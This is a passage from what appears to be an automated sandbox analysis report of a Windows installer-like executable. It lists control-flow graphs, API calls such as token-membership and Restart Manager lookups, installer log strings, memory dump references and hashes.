56131->56132 56132->56116 56133->56126 56135->55882 56137->55895 56139 448462 56138->56139 56341 447a00 56139->56341
                                                                                Strings
                                                                                • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                • Installing into GAC, xrefs: 00471714
                                                                                • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                • Installing the file., xrefs: 00470F09
                                                                                • .tmp, xrefs: 00470FB7
                                                                                • @, xrefs: 004707B0
                                                                                • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                • Version of our file: (none), xrefs: 00470AFC
                                                                                • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                • Version of existing file: (none), xrefs: 00470CFA
                                                                                • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                • Same version. Skipping., xrefs: 00470CE5
                                                                                • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                • Stripped read-only attribute., xrefs: 00470EC7
                                                                                • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                • Dest file exists., xrefs: 004709BB
                                                                                • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                • Same time stamp. Skipping., xrefs: 00470D55
                                                                                • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                • InUn, xrefs: 0047115F
                                                                                • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                • Time stamp of our file: %s, xrefs: 0047099B
                                                                                • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                • -- File entry --, xrefs: 004706FB
                                                                                • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                • Dest filename: %s, xrefs: 00470894
                                                                                • Will register the file (a type library) later., xrefs: 00471513
                                                                                • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                • API String ID: 0-4021121268
                                                                                • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1381 42e09c-42e0ad 1382 42e0b8-42e0dd AllocateAndInitializeSid 1381->1382 1383 42e0af-42e0b3 1381->1383 1384 42e0e3-42e100 GetVersion 1382->1384 1385 42e287-42e28f 1382->1385 1383->1385 1386 42e102-42e117 GetModuleHandleA GetProcAddress 1384->1386 1387 42e119-42e11b 1384->1387 1386->1387 1388 42e142-42e15c GetCurrentThread OpenThreadToken 1387->1388 1389 42e11d-42e12b CheckTokenMembership 1387->1389 1392 42e193-42e1bb GetTokenInformation 1388->1392 1393 42e15e-42e168 GetLastError 1388->1393 1390 42e131-42e13d 1389->1390 1391 42e269-42e27f FreeSid 1389->1391 1390->1391 1396 42e1d6-42e1fa call 402648 GetTokenInformation 1392->1396 1397 42e1bd-42e1c5 GetLastError 1392->1397 1394 42e174-42e187 GetCurrentProcess OpenProcessToken 1393->1394 1395 42e16a-42e16f call 4031bc 1393->1395 1394->1392 1401 42e189-42e18e call 4031bc 1394->1401 1395->1385 1407 42e208-42e210 1396->1407 1408 42e1fc-42e206 call 4031bc * 2 1396->1408 1397->1396 1398 42e1c7-42e1d1 call 4031bc * 2 1397->1398 1398->1385 1401->1385 1412 42e212-42e213 1407->1412 1413 42e243-42e261 call 402660 CloseHandle 1407->1413 1408->1385 1417 42e215-42e228 EqualSid 1412->1417 1418 42e22a-42e237 1417->1418 1419 42e23f-42e241 1417->1419 1418->1419 1422 42e239-42e23d 1418->1422 1419->1413 1419->1417 1422->1413
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                • API String ID: 2252812187-1888249752
                                                                                • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1445 4502c0-4502cd 1446 4502d3-4502e0 GetVersion 1445->1446 1447 45037c-450386 1445->1447 1446->1447 1448 4502e6-4502fc LoadLibraryA 1446->1448 1448->1447 1449 4502fe-450377 GetProcAddress * 6 1448->1449 1449->1447
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmStartSession), ref: 00450309
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmRegisterResources), ref: 0045031E
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmGetList), ref: 00450333
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmShutdown), ref: 00450348
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmRestart), ref: 0045035D
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmEndSession), ref: 00450372
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                • API String ID: 1968650500-3419246398
                                                                                • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1593 423c0c-423c40 1594 423c42-423c43 1593->1594 1595 423c74-423c8b call 423b68 1593->1595 1596 423c45-423c61 call 40b24c 1594->1596 1601 423cec-423cf1 1595->1601 1602 423c8d 1595->1602 1624 423c63-423c6b 1596->1624 1625 423c70-423c72 1596->1625 1603 423cf3 1601->1603 1604 423d27-423d2c 1601->1604 1605 423c93-423c96 1602->1605 1606 423d50-423d60 1602->1606 1612 423fb1-423fb9 1603->1612 1613 423cf9-423d01 1603->1613 1607 423d32-423d35 1604->1607 1608 42409a-4240a8 IsIconic 1604->1608 1614 423cc5-423cc8 1605->1614 1615 423c98 1605->1615 1610 423d62-423d67 1606->1610 1611 423d6b-423d73 call 424194 1606->1611 1618 4240d6-4240eb call 424850 1607->1618 1619 423d3b-423d3c 1607->1619 1620 424152-42415a 1608->1620 1629 4240ae-4240b9 GetFocus 1608->1629 1626 423d78-423d80 call 4241dc 1610->1626 1627 423d69-423d8c call 423b84 1610->1627 1611->1620 1612->1620 1621 423fbf-423fca call 4181e0 1612->1621 1630 423f13-423f3a SendMessageA 1613->1630 1631 423d07-423d0c 1613->1631 1622 423da9-423db0 1614->1622 1623 423cce-423ccf 1614->1623 1616 423df6-423e06 call 423b84 1615->1616 1617 423c9e-423ca1 1615->1617 1616->1620 1640 423ca7-423caa 1617->1640 1641 423e1e-423e3a PostMessageA call 423b84 1617->1641 1618->1620 1634 423d42-423d45 1619->1634 1635 4240ed-4240f4 1619->1635 1633 424171-424177 1620->1633 1621->1620 1683 423fd0-423fdf call 4181e0 IsWindowEnabled 1621->1683 1622->1620 1644 423db6-423dbd 1622->1644 1645 423cd5-423cd8 1623->1645 1646 423f3f-423f46 1623->1646 1624->1633 1625->1595 1625->1596 1626->1620 1627->1620 1629->1620 1639 4240bf-4240c8 call 41eff4 1629->1639 1630->1620 1647 423d12-423d13 1631->1647 1648 42404a-424055 1631->1648 1650 424120-424127 1634->1650 1651 423d4b 1634->1651 1661 4240f6-424109 call 4244d4 1635->1661 1662 42410b-42411e call 42452c 1635->1662 1639->1620 1695 4240ce-4240d4 SetFocus 1639->1695 1658 423cb0-423cb3 1640->1658 1659 423ea5-423eac 1640->1659 1641->1620 1644->1620 1664 423dc3-423dc9 1644->1664 1665 423cde-423ce1 1645->1665 1666 423e3f-423e5f call 423b84 1645->1666 1646->1620 1654 423f4c-423f51 call 404e54 1646->1654 1667 424072-42407d 1647->1667 1668 423d19-423d1c 1647->1668 1648->1620 1652 42405b-42406d 1648->1652 1687 42413a-424149 1650->1687 1688 424129-424138 1650->1688 1671 42414b-42414c call 423b84 1651->1671 1652->1620 1654->1620 1678 423cb9-423cba 1658->1678 1679 423dce-423ddc IsIconic 1658->1679 1680 423eae-423ec1 call 423b14 1659->1680 1681 423edf-423ef0 call 423b84 1659->1681 1661->1620 1662->1620 1664->1620 1684 423ce7 1665->1684 1685 423e0b-423e19 call 424178 1665->1685 1712 423e83-423ea0 call 423a84 PostMessageA 1666->1712 1713 423e61-423e7e call 423b14 PostMessageA 1666->1713 1667->1620 1672 424083-424095 1667->1672 1669 423d22 1668->1669 1670 423f56-423f5e 1668->1670 1669->1671 1670->1620 1693 423f64-423f6b 1670->1693 1708 424151 1671->1708 1672->1620 1696 423cc0 1678->1696 1697 423d91-423d99 1678->1697 1703 423dea-423df1 call 423b84 1679->1703 1704 423dde-423de5 call 423bc0 1679->1704 1725 423ed3-423eda call 423b84 1680->1725 1726 423ec3-423ecd call 41ef58 1680->1726 1719 423ef2-423ef8 call 41eea4 1681->1719 1720 423f06-423f0e call 423a84 1681->1720 1683->1620 1727 423fe5-423ff4 call 4181e0 IsWindowVisible 1683->1727 1684->1671 1685->1620 1687->1620 1688->1620 1693->1620 1711 423f71-423f80 call 4181e0 IsWindowEnabled 1693->1711 1695->1620 1696->1671 1697->1620 1714 423d9f-423da4 call 422c4c 1697->1714 1703->1620 1704->1620 1708->1620 1711->1620 1740 423f86-423f9c call 412310 1711->1740 1712->1620 1713->1620 1714->1620 1738 423efd-423f00 1719->1738 1720->1620 1725->1620 1726->1725 1727->1620 1745 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1727->1745 1738->1720 1740->1620 1749 423fa2-423fac 1740->1749 1745->1620 1749->1620
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1936 4673a4-4673ba 1937 4673c4-46747b call 49577c call 402b30 * 6 1936->1937 1938 4673bc-4673bf call 402d30 1936->1938 1955 46747d-4674a4 call 41463c 1937->1955 1956 4674b8-4674d1 1937->1956 1938->1937 1960 4674a6 1955->1960 1961 4674a9-4674b3 call 4145fc 1955->1961 1962 4674d3-4674fa call 41461c 1956->1962 1963 46750e-46751c call 495a84 1956->1963 1960->1961 1961->1956 1971 4674ff-467509 call 4145dc 1962->1971 1972 4674fc 1962->1972 1969 46751e-46752d call 4958cc 1963->1969 1970 46752f-467531 call 4959f0 1963->1970 1977 467536-467589 call 4953e0 call 41a3d0 * 2 1969->1977 1970->1977 1971->1963 1972->1971 1984 46759a-4675af call 451458 call 414b18 1977->1984 1985 46758b-467598 call 414b18 1977->1985 1990 4675b4-4675bb 1984->1990 1985->1990 1992 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 1990->1992 1993 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 1990->1993 2123 467ae5-467afe call 414a44 * 2 1992->2123 2124 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 1992->2124 1993->1992 2131 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2123->2131 2124->2131 2150 467bb6-467bd1 2131->2150 2151 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2131->2151 2152 467bd6-467be9 call 4145fc 2150->2152 2153 467bd3 2150->2153 2212 467e26-467e2f 2151->2212 2213 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2151->2213 2152->2151 2153->2152 2212->2213 2214 467e31-467e60 call 414a44 call 466b40 2212->2214 2231 467f20-467f3b 2213->2231 2232 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2213->2232 2214->2213 2233 467f40-467f53 call 4145fc 2231->2233 2234 467f3d 2231->2234 2331 46839d-4683a4 2232->2331 2332 46837b-468398 call 44ffdc call 450138 2232->2332 2233->2232 2234->2233 2333 4683a6-4683c3 call 44ffdc call 450138 2331->2333 2334 4683c8-4683cf 2331->2334 2332->2331 2333->2334 2338 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2334->2338 2339 4683d1-4683ee call 44ffdc call 450138 2334->2339 2352 468453 2338->2352 2353 46843b-468442 2338->2353 2339->2338 2356 468455-468464 2352->2356 2354 468444-46844d 2353->2354 2355 46844f-468451 2353->2355 2354->2352 2354->2355 2355->2356 2357 468466-46846d 2356->2357 2358 46847e 2356->2358 2359 46846f-468478 2357->2359 2360 46847a-46847c 2357->2360 2361 468480-46849a 2358->2361 2359->2358 2359->2360 2360->2361 2362 468543-46854a 2361->2362 2363 4684a0-4684a9 2361->2363 2364 468550-468573 call 47c26c call 403450 2362->2364 2365 4685dd-4685eb call 414b18 2362->2365 2366 468504-46853e call 414b18 * 3 2363->2366 2367 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2363->2367 2389 468584-468598 call 403494 2364->2389 2390 468575-468582 call 47c440 2364->2390 2374 4685f0-4685f9 2365->2374 2366->2362 2367->2362 2378 4685ff-468617 call 429fd8 2374->2378 2379 468709-468738 call 42b96c call 44e83c 2374->2379 2396 46868e-468692 2378->2396 2397 468619-46861d 2378->2397 2406 4687e6-4687ea 2379->2406 2407 46873e-468742 2379->2407 2411 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2389->2411 2412 46859a-4685a5 call 403494 2389->2412 2390->2411 2402 468694-46869d 2396->2402 2403 4686e2-4686e6 2396->2403 2404 46861f-468659 call 40b24c call 47c26c 2397->2404 2402->2403 2413 46869f-4686aa 2402->2413 2409 4686fa-468704 call 42a05c 2403->2409 2410 4686e8-4686f8 call 42a05c 2403->2410 2464 46865b-468662 2404->2464 2465 468688-46868c 2404->2465 2418 4687ec-4687f3 2406->2418 2419 468869-46886d 2406->2419 2417 468744-468756 call 40b24c 2407->2417 2409->2379 2410->2379 2411->2374 2412->2411 2413->2403 2415 4686ac-4686b0 2413->2415 2425 4686b2-4686d5 call 40b24c call 406ac4 2415->2425 2444 468788-4687bf call 47c26c call 44cb0c 2417->2444 2445 468758-468786 call 47c26c call 44cbdc 2417->2445 2418->2419 2428 4687f5-4687fc 2418->2428 2429 4688d6-4688df 2419->2429 2430 46886f-468886 call 40b24c 2419->2430 2474 4686d7-4686da 2425->2474 2475 4686dc-4686e0 2425->2475 2428->2419 2439 4687fe-468809 2428->2439 2437 4688e1-4688f9 call 40b24c call 4699fc 2429->2437 2438 4688fe-468913 call 466ee0 call 466c5c 2429->2438 2457 4688c6-4688d4 call 4699fc 2430->2457 2458 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2430->2458 2437->2438 2489 468965-46896f call 414a44 2438->2489 2490 468915-468938 call 42a040 call 40b24c 2438->2490 2439->2438 2447 46880f-468813 2439->2447 2482 4687c4-4687c8 2444->2482 2445->2482 2456 468815-46882b call 40b24c 2447->2456 2486 46885e-468862 2456->2486 2487 46882d-468859 call 42a05c call 4699fc call 46989c 2456->2487 2457->2438 2458->2438 2464->2465 2476 468664-468676 call 406ac4 2464->2476 2465->2396 2465->2404 2474->2403 2475->2403 2475->2425 2476->2465 2501 468678-468682 2476->2501 2492 4687d3-4687d5 2482->2492 2493 4687ca-4687d1 2482->2493 2486->2456 2494 468864 2486->2494 2487->2438 2502 468974-468993 call 414a44 2489->2502 2518 468943-468952 call 414a44 2490->2518 2519 46893a-468941 2490->2519 2500 4687dc-4687e0 2492->2500 2493->2492 2493->2500 2494->2438 2500->2406 2500->2417 2501->2465 2506 468684 2501->2506 2514 468995-4689b8 call 42a040 call 469b5c 2502->2514 2515 4689bd-4689e0 call 47c26c call 403450 2502->2515 2506->2465 2514->2515 2533 4689e2-4689eb 2515->2533 2534 4689fc-468a05 2515->2534 2518->2502 2519->2518 2523 468954-468963 call 414a44 2519->2523 2523->2502 2533->2534 2535 4689ed-4689fa call 47c440 2533->2535 2536 468a07-468a19 call 403684 2534->2536 2537 468a1b-468a2b call 403494 2534->2537 2545 468a3d-468a54 call 414b18 2535->2545 2536->2537 2544 468a2d-468a38 call 403494 2536->2544 2537->2545 2544->2545 2549 468a56-468a5d 2545->2549 2550 468a8a-468a94 call 414a44 2545->2550 2552 468a5f-468a68 2549->2552 2553 468a6a-468a74 call 42b0e4 2549->2553 2554 468a99-468abe call 403400 * 3 2550->2554 2552->2553 2555 468a79-468a88 call 414a44 2552->2555 2553->2555 2555->2554
                                                                                APIs
                                                                                  • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                  • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                  • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                  • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                  • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                  • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                  • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                  • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                  • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                  • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021BFC4C,021C1944,?,?,021C1974,?,?,021C19C4,?), ref: 004683FD
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                  • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                • String ID: $(Default)$STOPIMAGE$%H
                                                                                • API String ID: 3231140908-2624782221
                                                                                • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                Strings
                                                                                Memory Dump Source
